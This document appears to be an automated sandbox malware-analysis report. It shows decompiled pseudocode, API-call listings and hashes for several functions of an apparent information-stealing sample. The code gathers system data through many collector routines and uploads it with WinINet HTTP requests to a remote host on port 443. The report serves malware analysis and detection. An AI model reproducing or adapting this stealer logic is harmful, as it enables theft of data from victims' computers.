StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 00406416
lstrcat.KERNEL32(?,00000000), ref: 0040644B
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 0040646B
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 004064B0
lstrcat.KERNEL32(?,00000000), ref: 004064E5
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 00406505
lstrcat.KERNEL32(?,00000000), ref: 0040654B
StrCmpCA.SHLWAPI(00000000,00418BE0), ref: 00406562
StrCmpCA.SHLWAPI(00000000,00418BE0), ref: 0040658A

Part of subcall function 00406130: wsprintfA.USER32 ref: 0040616C
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 004061BC
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 004061EA
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 00406218
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 00406246

Strings

Qg@, xrefs: 004065BA, 004065BD

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcatlstrcpy$wsprintf
String ID: Qg@
API String ID: 2209684894-3462340965
Opcode ID: 315f55e7bfbd4beb232a1c8891c28293502b42785fb1e119d37202c3e2330f60
Instruction ID: a6c453932f1a9cbb60a7cc7ac58ece15fec1271fc19e7cecd9f856b6af5d47a2
Opcode Fuzzy Hash: 315f55e7bfbd4beb232a1c8891c28293502b42785fb1e119d37202c3e2330f60
Instruction Fuzzy Hash: CB7160B5904218EBCB24DF50DC85BEA73B8AF44304F0482EEE10AA7290D7799BD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406650, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 176
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406650(void* __ecx, void* __eflags) {
				char _v5004;
				char _v5268;
				char _v10268;
				char _v10272;
				char _v10276;
				char _v10540;
				char _v10544;
				intOrPtr _t46;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t61;
				intOrPtr _t71;
				void* _t76;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				CHAR* _t117;
				void* _t121;
				void* _t129;
				void* _t133;

				_t133 = __eflags;
				E004139B0(0x292c, __ecx);
				_v10544 = E00413730(0, 0x6400000, 0);
				E0040B720( &_v5268, 0x104);
				E0040B720( &_v10268, 0x1388);
				E0040B720( &_v10540, 0x104);
				 *0x41aa24( &_v5268, E0040B8B0( &_v10268, _t133, 0x10));
				_t90 =  *0x41a260; // 0x60f5e0
				 *0x41aa24( &_v5268, _t90);
				_t46 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v10540, _t46);
				_t107 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v10540, _t107);
				_t92 =  *0x41a76c; // 0x627770
				 *0x41aa24( &_v10540, _t92);
				_t51 =  *0x41a714; // 0x627b00
				_t93 =  *0x41a288; // 0x6277e8
				_t109 =  *0x41a7c4; // 0x625b10
				_t52 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v10268, E004051A0(_t93, _t133, _t52, _t109, _t93, _t51));
				E00406320( &_v10268, _t133,  &_v10268, _v10544);
				E0040B720( &_v10268, 0x1388);
				_t111 =  *0x41a6a4; // 0x626fc0
				E004049E0( &_v10268,  &_v10540, _t111);
				E0040B720( &_v10540, 0x104);
				_t112 =  *0x41aba8; // 0x0
				_t61 =  *0x41abac; // 0x0
				_t97 =  *0x41aba4; // 0x0
				E0040A700(_t133, _v10544, _t97, _t61, _t112);
				E00401470(_v10544);
				E004056E0(_v10544, _t133, _v10544);
				_t129 = _t121 + 0x48;
				_t134 =  *0x41abb0;
				if( *0x41abb0 != 0) {
					E0040BCF0(_t134, 0x41, _v10544);
					_t129 = _t129 + 8;
				}
				E00413800(_v10544,  &_v10276,  &_v10272);
				E0040B720( &_v5004, 0x1388);
				_t101 =  *0x41a288; // 0x6277e8
				_t116 =  *0x41a7c4; // 0x625b10
				_t71 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v5004, E00404BE0(_t101, _t134, _t71, _t116, _t101,  &_v5268, _v10276, _v10272));
				_t117 =  *0x41a6a8; // 0x628680
				SetCurrentDirectoryA(_t117);
				_t76 =  *0x41a908( &_v5004);
				_t135 = _t76 - 5;
				if(_t76 > 5) {
					E00405B00(_t135,  &_v5004);
				}
				E0040B720( &_v5268, 0x104);
				E0040B720( &_v5004, 0x1388);
				E0040B720( &_v10276, 4);
				E0040B720( &_v10272, 4);
				E0040B720( &_v10544, 4);
				E00405DE0();
				 *0x41abb4 = 1;
				return 0;
			}

0x00406650
0x00406658
0x0040666e
0x00406680
0x00406691
0x004066a2
0x004066b9
0x004066bf
0x004066cd
0x004066d3
0x004066e0
0x004066e6
0x004066f4
0x004066fa
0x00406708
0x0040670e
0x00406714
0x0040671b
0x00406722
0x00406738
0x0040674c
0x00406760
0x00406765
0x00406773
0x00406787
0x0040678c
0x00406793
0x00406799
0x004067a7
0x004067b6
0x004067c5
0x004067ca
0x004067cd
0x004067d4
0x004067df
0x004067e4
0x004067e4
0x004067fc
0x00406810
0x0040682a
0x00406831
0x00406838
0x0040684e
0x00406854
0x0040685b
0x00406868
0x0040686e
0x00406871
0x0040687a
0x0040687f
0x0040688e
0x0040689f
0x004068ad
0x004068bb
0x004068c9
0x004068ce
0x004068d3
0x004068e2

APIs

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 004066B9
lstrcat.KERNEL32(?,0060F5E0), ref: 004066CD
lstrcat.KERNEL32(?,006109A0), ref: 004066E0
lstrcat.KERNEL32(?,00625B10), ref: 004066F4
lstrcat.KERNEL32(?,00627770), ref: 00406708

Part of subcall function 004051A0: InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 004051CD
Part of subcall function 004051A0: StrCmpCA.SHLWAPI(00000000,https://), ref: 004051F3
Part of subcall function 004051A0: InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040522D
Part of subcall function 004051A0: InternetConnectA.WININET(00000000,006109A0,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00405253
Part of subcall function 004051A0: HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00C00100,00000000), ref: 004052B3
Part of subcall function 004051A0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405327
Part of subcall function 004051A0: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00405343
Part of subcall function 004051A0: StrCmpCA.SHLWAPI(?,200), ref: 00405359

lstrcat.KERNEL32(?,00000000), ref: 00406738

Part of subcall function 00406320: lstrcat.KERNEL32(?,?), ref: 00406394

Part of subcall function 004049E0: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E

Part of subcall function 0040A700: GetProcessHeap.KERNEL32(00000000,000F423F,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 0040A70A
Part of subcall function 0040A700: RtlAllocateHeap.NTDLL(00000000,?,004067AC), ref: 0040A711

Part of subcall function 004056E0: GetProcessHeap.KERNEL32(00000000,000F423F,?,?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 004056EB
Part of subcall function 004056E0: RtlAllocateHeap.NTDLL(00000000,?,004067CA), ref: 004056F2
Part of subcall function 004056E0: lstrcat.KERNEL32(?,0060E518), ref: 00405705
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00622368), ref: 00405716
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC0), ref: 00405725
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00610410), ref: 00405736
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC4), ref: 00405745
Part of subcall function 004056E0: lstrcat.KERNEL32(?,006257D0), ref: 00405756
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC0), ref: 00405765
Part of subcall function 004056E0: lstrcat.KERNEL32(?,006276F8), ref: 00405776
Part of subcall function 004056E0: GetCurrentProcessId.KERNEL32(?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 0040577C
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00000000), ref: 00405790
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040579F
Part of subcall function 004056E0: lstrcat.KERNEL32(00627680,00627680), ref: 004057AF
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 004057BF
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004057CE
Part of subcall function 004056E0: lstrcat.KERNEL32(00627698,00627698), ref: 004057DF
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 004057EF
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004057FE
Part of subcall function 004056E0: lstrcat.KERNEL32(006258F0,006258F0), ref: 0040580F
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 0040581F
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040582E

lstrcat.KERNEL32(?,00000000), ref: 0040684E
SetCurrentDirectoryA.KERNEL32(00628680,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 0040685B
lstrlen.KERNEL32(?,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 00406868

Strings

pwb, xrefs: 004066FA
wb, xrefs: 00406714, 0040682A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$HeapInternet$HttpOpenProcess$AllocateCurrentRequest$ConnectDirectoryInfoOptionQuerySendSystemTimelstrlen
String ID: pwb$wb
API String ID: 2767677664-3522877914
Opcode ID: fabbc2a9677d3c6aeca39df0d5bc9609c913b9ae446aed9ab3f1a9a909d992f7
Instruction ID: 4521fb7a1d59e918bbbcfb22c6a1b4b47e0d9ef7d9e5ed5fdd184795f43376b9
Opcode Fuzzy Hash: fabbc2a9677d3c6aeca39df0d5bc9609c913b9ae446aed9ab3f1a9a909d992f7
Instruction Fuzzy Hash: 476159B6901214ABD711EB60DC45DDA73BCEB4C744F00C5AAF209A3191DB78E794CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A700, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 489
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040A700(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t233;
				void* _t234;
				intOrPtr _t241;
				intOrPtr _t243;
				intOrPtr _t245;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t251;
				intOrPtr _t253;
				intOrPtr _t255;
				intOrPtr _t257;
				intOrPtr _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				intOrPtr _t265;
				intOrPtr _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t275;
				intOrPtr _t277;
				intOrPtr _t279;
				intOrPtr _t281;
				intOrPtr _t283;
				intOrPtr _t285;
				intOrPtr _t287;
				intOrPtr _t289;
				intOrPtr _t291;
				intOrPtr _t293;
				intOrPtr _t295;
				intOrPtr _t297;
				intOrPtr _t299;
				intOrPtr _t301;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr _t305;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t311;
				intOrPtr _t313;
				intOrPtr _t315;
				intOrPtr _t317;
				intOrPtr _t319;
				intOrPtr _t321;
				intOrPtr _t323;
				intOrPtr _t325;
				intOrPtr _t327;
				intOrPtr _t329;
				intOrPtr _t331;
				intOrPtr _t333;
				intOrPtr _t335;
				intOrPtr _t337;
				intOrPtr _t339;
				intOrPtr _t341;
				intOrPtr _t343;
				intOrPtr _t345;
				intOrPtr _t347;
				intOrPtr _t349;
				intOrPtr _t351;
				intOrPtr _t353;
				intOrPtr _t355;
				intOrPtr _t357;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t365;
				intOrPtr _t367;
				intOrPtr _t369;
				intOrPtr _t370;
				intOrPtr _t371;
				void* _t407;

				_t407 = __eflags;
				 *0x41a838 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
				E00407060();
				 *0x41a83c = 0;
				_t241 =  *0x41a290; // 0x6293d8
				_t307 =  *0x41a250; // 0x627088
				E0040A3F0(_t241, _t407, _t307, _t241, _a4, _a8, _a12, _a16);
				_t243 =  *0x41a1dc; // 0x628530
				_t309 =  *0x41a7a0; // 0x628fe0
				E0040A3F0(_t243, _t407, _t309, _t243, _a4, _a8, _a12, _a16);
				_t245 =  *0x41a750; // 0x628668
				_t311 =  *0x41a09c; // 0x6270b0
				E0040A3F0(_t245, _t407, _t311, _t245, _a4, _a8, _a12, _a16);
				_t247 =  *0x41a27c; // 0x629358
				_t313 =  *0x41a7cc; // 0x629020
				E0040A3F0(_t247, _t407, _t313, _t247, _a4, _a8, _a12, _a16);
				_t249 =  *0x41a520; // 0x629368
				_t315 =  *0x41a638; // 0x629040
				E0040A3F0(_t249, _t407, _t315, _t249, _a4, _a8, _a12, _a16);
				_t251 =  *0x41a42c; // 0x629388
				_t317 =  *0x41a7d8; // 0x628ca0
				E0040A3F0(_t251, _t407, _t317, _t251, _a4, _a8, _a12, _a16);
				_t253 =  *0x41a5c8; // 0x629448
				_t319 =  *0x41a390; // 0x628cc0
				E0040A3F0(_t253, _t407, _t319, _t253, _a4, _a8, _a12, _a16);
				_t255 =  *0x41a47c; // 0x629458
				_t321 =  *0x41a068; // 0x626e58
				E0040A3F0(_t255, _t407, _t321, _t255, _a4, _a8, _a12, _a16);
				_t257 =  *0x41a24c; // 0x628548
				_t323 =  *0x41a168; // 0x628ce0
				E0040A3F0(_t257, _t407, _t323, _t257, _a4, _a8, _a12, _a16);
				_t259 =  *0x41a3e0; // 0x6285a8
				_t325 =  *0x41a1d4; // 0x6284b8
				E0040A3F0(_t259, _t407, _t325, _t259, _a4, _a8, _a12, _a16);
				_t261 =  *0x41a028; // 0x6293e8
				_t327 =  *0x41a5e0; // 0x628d00
				E0040A3F0(_t261, _t407, _t327, _t261, _a4, _a8, _a12, _a16);
				_t263 =  *0x41a614; // 0x629398
				_t329 =  *0x41a738; // 0x626e08
				E0040A3F0(_t263, _t407, _t329, _t263, _a4, _a8, _a12, _a16);
				_t265 =  *0x41a444; // 0x6293a8
				_t331 =  *0x41a338; // 0x628aa0
				E0040A3F0(_t265, _t407, _t331, _t265, _a4, _a8, _a12, _a16);
				_t267 =  *0x41a094; // 0x6292f8
				_t333 =  *0x41a304; // 0x626e80
				E0040A3F0(_t267, _t407, _t333, _t267, _a4, _a8, _a12, _a16);
				_t269 =  *0x41a440; // 0x629348
				_t335 =  *0x41a588; // 0x627100
				E0040A3F0(_t269, _t407, _t335, _t269, _a4, _a8, _a12, _a16);
				_t271 =  *0x41a54c; // 0x6293f8
				_t337 =  *0x41a764; // 0x628a00
				E0040A3F0(_t271, _t407, _t337, _t271, _a4, _a8, _a12, _a16);
				_t273 =  *0x41a6e0; // 0x629408
				_t339 =  *0x41a6b4; // 0x628a20
				E0040A3F0(_t273, _t407, _t339, _t273, _a4, _a8, _a12, _a16);
				_t275 =  *0x41a100; // 0x6285c0
				_t341 =  *0x41a078; // 0x626ea8
				E0040A3F0(_t275, _t407, _t341, _t275, _a4, _a8, _a12, _a16);
				_t277 =  *0x41a708; // 0x6292a8
				_t343 =  *0x41a5c4; // 0x628620
				E0040A3F0(_t277, _t407, _t343, _t277, _a4, _a8, _a12, _a16);
				_t279 =  *0x41a114; // 0x628560
				_t345 =  *0x41a634; // 0x627150
				E0040A3F0(_t279, _t407, _t345, _t279, _a4, _a8, _a12, _a16);
				_t281 =  *0x41a3e8; // 0x629468
				_t347 =  *0x41a414; // 0x626bd0
				E0040A3F0(_t281, _t407, _t347, _t281, _a4, _a8, _a12, _a16);
				_t283 =  *0x41a398; // 0x629308
				_t349 =  *0x41a024; // 0x627178
				E0040A510(_t283, _t407, _t349, _t283, _a4, _a8, _a12, _a16);
				_t285 =  *0x41a3bc; // 0x629338
				_t351 =  *0x41a2c8; // 0x626a80
				E0040A510(_t285, _t407, _t351, _t285, _a4, _a8, _a12, _a16);
				_t287 =  *0x41a5c0; // 0x6284d0
				_t353 =  *0x41a320; // 0x626ae0
				E0040A3F0(_t287, _t407, _t353, _t287, _a4, _a8, _a12, _a16);
				_t289 =  *0x41a350; // 0x6292e8
				_t355 =  *0x41a0c4; // 0x626ed0
				E0040A620(_t289, _t407, _t355, _t289, _a4, _a8, _a12, _a16);
				_t291 =  *0x41a2ec; // 0x6283f8
				_t357 =  *0x41a620; // 0x626990
				E0040A620(_t291, _t407, _t357, _t291, _a4, _a8, _a12, _a16);
				_t293 =  *0x41a020; // 0x6284e8
				_t359 =  *0x41a704; // 0x622748
				E0040A620(_t293, _t407, _t359, _t293, _a4, _a8, _a12, _a16);
				_t295 =  *0x41a3d0; // 0x628638
				_t361 =  *0x41a224; // 0x628a60
				E0040A620(_t295, _t407, _t361, _t295, _a4, _a8, _a12, _a16);
				_t297 =  *0x41a29c; // 0x628578
				_t363 =  *0x41a7e0; // 0x6269c0
				E0040A620(_t297, _t407, _t363, _t297, _a4, _a8, _a12, _a16);
				_t299 =  *0x41a57c; // 0x628500
				_t365 =  *0x41a34c; // 0x622668
				E0040A620(_t299, _t407, _t365, _t299, _a4, _a8, _a12, _a16);
				_t301 =  *0x41a060; // 0x629418
				_t367 =  *0x41a0d0; // 0x626fe8
				E0040A620(_t301, _t407, _t367, _t301, _a4, _a8, _a12, _a16);
				_t303 =  *0x41a1ec; // 0x629378
				_t369 =  *0x41a6dc; // 0x628518
				E0040A620(_t303, _t407, _t369, _t303, _a4, _a8, _a12, _a16);
				_t304 =  *0x41a21c; // 0x6285f0
				_t370 =  *0x41a484; // 0x628a40
				E0040A620(_t304, _t407, _t370, _t304, _a4, 0, 0, 0);
				E00406C10(_t304, _t407);
				_t233 =  *0x41a838; // 0x0
				_t234 =  *0x41a908(_t233);
				_t305 =  *0x41a838; // 0x0
				_t371 =  *0x41a660; // 0x628398
				E004137E0(_a4, _t371, _t305, _t234);
				E0040B720(0x41a838, 4);
				E00407150();
				return E00407170();
			}

0x0040a700
0x0040a717
0x0040a71c
0x0040a721
0x0040a73b
0x0040a742
0x0040a749
0x0040a761
0x0040a768
0x0040a76f
0x0040a787
0x0040a78e
0x0040a795
0x0040a7ad
0x0040a7b4
0x0040a7bb
0x0040a7d3
0x0040a7da
0x0040a7e1
0x0040a7f9
0x0040a800
0x0040a807
0x0040a81f
0x0040a826
0x0040a82d
0x0040a845
0x0040a84c
0x0040a853
0x0040a86b
0x0040a872
0x0040a879
0x0040a891
0x0040a898
0x0040a89f
0x0040a8b7
0x0040a8be
0x0040a8c5
0x0040a8dd
0x0040a8e4
0x0040a8eb
0x0040a903
0x0040a90a
0x0040a911
0x0040a929
0x0040a930
0x0040a937
0x0040a94f
0x0040a956
0x0040a95d
0x0040a975
0x0040a97c
0x0040a983
0x0040a99b
0x0040a9a2
0x0040a9a9
0x0040a9c1
0x0040a9c8
0x0040a9cf
0x0040a9e7
0x0040a9ee
0x0040a9f5
0x0040aa0d
0x0040aa14
0x0040aa1b
0x0040aa33
0x0040aa3a
0x0040aa41
0x0040aa59
0x0040aa60
0x0040aa67
0x0040aa7f
0x0040aa86
0x0040aa8d
0x0040aaa5
0x0040aaac
0x0040aab3
0x0040aacb
0x0040aad2
0x0040aad9
0x0040aaf1
0x0040aaf8
0x0040aaff
0x0040ab17
0x0040ab1e
0x0040ab25
0x0040ab3d
0x0040ab44
0x0040ab4b
0x0040ab63
0x0040ab6a
0x0040ab71
0x0040ab89
0x0040ab90
0x0040ab97
0x0040abaf
0x0040abb6
0x0040abbd
0x0040abd5
0x0040abdc
0x0040abe3
0x0040abf5
0x0040abfc
0x0040ac03
0x0040ac0b
0x0040ac10
0x0040ac16
0x0040ac1d
0x0040ac24
0x0040ac2f
0x0040ac3e
0x0040ac43
0x0040ac4e

APIs

GetProcessHeap.KERNEL32(00000000,000F423F,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 0040A70A
RtlAllocateHeap.NTDLL(00000000,?,004067AC), ref: 0040A711

Part of subcall function 00407060: LoadLibraryA.KERNEL32(00626FC0,?,0040A721,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 00407069
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,006280C8), ref: 0040708F
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628D40), ref: 004070A7
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628350), ref: 004070BF
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628F40), ref: 004070D8
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628E60), ref: 004070F0
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628140), ref: 00407108
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628DE0), ref: 00407121
Part of subcall function 00407060: GetProcAddress.KERNEL32(00000000,00628E80), ref: 00407139

Part of subcall function 0040A3F0: lstrcat.KERNEL32(?,00000000), ref: 0040A434
Part of subcall function 0040A3F0: lstrcat.KERNEL32(?,?), ref: 0040A459
Part of subcall function 0040A3F0: lstrcat.KERNEL32(?,00628440), ref: 0040A46D

Part of subcall function 0040A510: lstrcat.KERNEL32(?,00000000), ref: 0040A554
Part of subcall function 0040A510: lstrcat.KERNEL32(?,?), ref: 0040A579
Part of subcall function 0040A510: lstrcat.KERNEL32(?,00628440), ref: 0040A58D

Part of subcall function 0040A620: lstrcat.KERNEL32(?,00000000), ref: 0040A667
Part of subcall function 0040A620: lstrcat.KERNEL32(?,?), ref: 0040A67B
Part of subcall function 0040A620: lstrcat.KERNEL32(?,00628410), ref: 0040A68F

Part of subcall function 00406C10: GetVersionExA.KERNEL32(00000094,?,00000094), ref: 00406C3D
Part of subcall function 00406C10: LoadLibraryA.KERNEL32(00627CF0), ref: 00406CAA

lstrlen.KERNEL32(00000000), ref: 0040AC16

Part of subcall function 00407150: FreeLibrary.KERNEL32(00000000,?,0040AC48,0041A838,00000004), ref: 00407159

Part of subcall function 00407170: FreeLibrary.KERNEL32(00000000,?,0040AC4D,0041A838,00000004), ref: 00407179

Strings

jb, xrefs: 0040AAAC
H'b, xrefs: 0040AB1E
Xnb, xrefs: 0040A84C
h&b, xrefs: 0040AB90
xqb, xrefs: 0040AA60
ob, xrefs: 0040ABB6
Pqb, xrefs: 0040AA14

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$AddressProc$Library$FreeHeapLoad$AllocateProcessVersionlstrlen
String ID: H'b$Pqb$Xnb$h&b$xqb$jb$ob
API String ID: 3801270024-4116518102
Opcode ID: e4c590f073aae42fd95466c43daafb47953024e11ecc261db994ac4226194d22
Instruction ID: a00dee89baef35c05d8f135df5621735fc6a2a2bdba59be032469b4e13cc99cb
Opcode Fuzzy Hash: e4c590f073aae42fd95466c43daafb47953024e11ecc261db994ac4226194d22
Instruction Fuzzy Hash: 830297B6615104BBCB04DF9DEC81DAB33BDAB8C704B04C51CBA1CD7255D634E961CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00411720, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 198
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411720(void* _a4, signed int* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				struct _BY_HANDLE_FILE_INFORMATION _v72;
				long _v76;
				void _v80;
				void _v84;
				void _v88;
				signed short _v92;
				signed short _v96;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr* _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t177;

				_v8 = GetFileInformationByHandle(_a4,  &_v72);
				if(_v8 == 0) {
					return 0x200;
				}
				_v16 = _v72.dwFileAttributes;
				_v12 = 0;
				if((_v16 & 0x00000001) != 0) {
					_v12 = _v12 | 0x00000001;
				}
				if((_v16 & 0x00000002) != 0) {
					_v12 = _v12 | 0x00000002;
				}
				if((_v16 & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000004;
				}
				if((_v16 & 0x00000010) != 0) {
					_v12 = _v12 | 0x00000010;
				}
				if((_v16 & 0x00000020) != 0) {
					_v12 = _v12 | 0x00000020;
				}
				if((_v16 & 0x00000010) == 0) {
					_v12 = _v12 | 0x80000000;
				} else {
					_v12 = _v12 | 0x40000000;
				}
				_v12 = _v12 | 0x01000000;
				if((_v16 & 0x00000001) == 0) {
					_v12 = _v12 | 0x00800000;
				}
				_v76 = GetFileSize(_a4, 0);
				if(_v76 > 0x28) {
					SetFilePointer(_a4, 0, 0, 0);
					ReadFile(_a4,  &_v80, 2,  &_v20, 0);
					SetFilePointer(_a4, 0x24, 0, 0);
					ReadFile(_a4,  &_v84, 4,  &_v20, 0);
					if((_v80 & 0x0000ffff) == 0x54ad && _v76 > _v84 + 0x34) {
						SetFilePointer(_a4, _v84, 0, 0);
						ReadFile(_a4,  &_v88, 4,  &_v20, 0);
						if(_v88 == 0x5a4d || _v88 == 0x454e || _v88 == 0x454c || _v88 == 0x4550) {
							_v12 = _v12 | 0x00400000;
						}
					}
				}
				if(_a8 != 0) {
					 *_a8 = _v12;
				}
				if(_a12 != 0) {
					 *_a12 = _v76;
				}
				if(_a16 != 0) {
					_t161 = _v72.ftLastAccessTime;
					_t103 = E00411630(_t161, _v56);
					_t138 = _a16;
					 *_t138 = _t103;
					 *((intOrPtr*)(_t138 + 4)) = _t161;
					_t162 = _v48;
					_t105 = E00411630(_v72.ftLastWriteTime, _t162);
					_t139 = _a16;
					 *((intOrPtr*)(_t139 + 8)) = _t105;
					 *((intOrPtr*)(_t139 + 0xc)) = _t162;
					_t163 = _v64;
					_t107 = E00411630(_v72.ftCreationTime, _t163);
					_t177 = _t177 + 0x18;
					_t140 = _a16;
					 *((intOrPtr*)(_t140 + 0x10)) = _t107;
					 *((intOrPtr*)(_t140 + 0x14)) = _t163;
				}
				if(_a20 != 0) {
					E00411670(_v72.ftLastWriteTime, _v48,  &_v96,  &_v92);
					 *_a20 = _v92 & 0x0000ffff | (_v96 & 0x0000ffff) << 0x00000010;
				}
				return 0;
			}

0x00411734
0x0041173b
0x00000000
0x0041173d
0x0041174a
0x0041174d
0x0041175a
0x00411762
0x00411762
0x0041176b
0x00411773
0x00411773
0x0041177c
0x00411784
0x00411784
0x0041178d
0x00411795
0x00411795
0x0041179e
0x004117a6
0x004117a6
0x004117af
0x004117c7
0x004117b1
0x004117ba
0x004117ba
0x004117d3
0x004117dc
0x004117e8
0x004117e8
0x004117f7
0x004117fe
0x0041180e
0x00411824
0x00411834
0x0041184a
0x0041185a
0x00411873
0x00411889
0x00411896
0x004118bc
0x004118bc
0x00411896
0x0041185a
0x004118c3
0x004118cb
0x004118cb
0x004118d1
0x004118d9
0x004118d9
0x004118df
0x004118e5
0x004118e9
0x004118f1
0x004118f4
0x004118f6
0x004118f9
0x00411901
0x00411909
0x0041190c
0x0041190f
0x00411912
0x0041191a
0x0041191f
0x00411922
0x00411925
0x00411928
0x00411928
0x0041192f
0x00411941
0x00411959
0x00411959
0x00000000

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 0041172E
GetFileSize.KERNEL32(00000000,00000000), ref: 004117F1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041180E
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 00411824
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 00411834
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041184A
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00411873

Strings

PE, xrefs: 004118AA
(, xrefs: 004117FA

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction ID: e3637cdcc6502234263c20fa9ec7c337361675902c7ba39fe6a18ec050177dc1
